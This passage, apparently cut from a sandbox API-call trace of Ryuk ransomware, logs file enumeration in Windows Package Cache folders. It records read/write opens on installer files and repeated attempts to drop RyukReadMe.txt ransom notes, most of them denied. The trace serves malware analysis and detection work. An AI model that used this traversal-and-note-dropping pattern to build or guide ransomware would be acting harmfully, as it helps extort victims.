| out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.787] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.788] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.788] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.788] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.788] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.788] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.788] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.788] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.789] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.789] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.789] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.789] SetLastError (dwErrCode=0x0) [0159.789] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.789] GetLastError () returned 0x5 [0159.789] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.789] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.789] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.789] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.789] SetLastError (dwErrCode=0x0) [0159.789] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.789] GetLastError () returned 0x5 [0159.789] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.789] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.790] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.790] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.790] SetLastError (dwErrCode=0x0) [0159.790] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.790] GetLastError () returned 0x5 [0159.790] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.790] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.790] SetLastError (dwErrCode=0x0) [0159.790] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.790] GetLastError () returned 0x5 [0159.790] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.790] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.791] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.791] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.791] SetLastError (dwErrCode=0x0) [0159.791] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.791] GetLastError () returned 0x5 [0159.791] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.791] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.791] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.791] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.791] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.791] SetLastError (dwErrCode=0x0) [0159.791] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.791] GetLastError () returned 0x5 [0159.792] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.792] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.792] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.792] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.792] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.792] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.792] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.793] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.793] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.793] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.793] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0159.793] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.793] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.793] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.794] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.794] SetLastError (dwErrCode=0x0) [0159.794] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.794] GetLastError () returned 0x5 [0159.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.794] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.794] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.794] SetLastError (dwErrCode=0x0) [0159.794] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.794] GetLastError () returned 0x5 [0159.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.794] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.794] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.794] SetLastError (dwErrCode=0x0) [0159.795] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.795] GetLastError () returned 0x5 [0159.795] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.795] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.795] SetLastError (dwErrCode=0x0) [0159.795] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.795] GetLastError () returned 0x5 [0159.795] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.795] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.795] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.795] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.795] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.796] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x80) returned 0 [0159.796] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.796] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.796] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.796] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.796] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.796] SetLastError (dwErrCode=0x0) [0159.796] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.797] GetLastError () returned 0x5 [0159.797] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.797] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.797] SetLastError (dwErrCode=0x0) [0159.797] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.797] GetLastError () returned 0x5 [0159.797] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.797] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.797] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.797] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.797] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.798] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x80) returned 0 [0159.798] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.798] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.798] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.798] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.798] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.798] SetLastError (dwErrCode=0x0) [0159.798] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.799] GetLastError () returned 0x5 [0159.799] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.799] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.799] SetLastError (dwErrCode=0x0) [0159.799] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.799] GetLastError () returned 0x5 [0159.799] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.799] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.799] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.799] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.799] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.800] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", dwFileAttributes=0x80) returned 0 [0159.800] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.800] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.800] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.800] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.800] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.800] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.800] SetLastError (dwErrCode=0x0) [0159.800] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.801] GetLastError () returned 0x5 [0159.801] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.801] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.801] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.801] SetLastError (dwErrCode=0x0) [0159.801] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.801] GetLastError () returned 0x5 [0159.801] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.801] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.801] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.801] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.801] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.801] SetLastError (dwErrCode=0x0) [0159.801] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.802] GetLastError () returned 0x5 [0159.802] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.802] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.802] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: 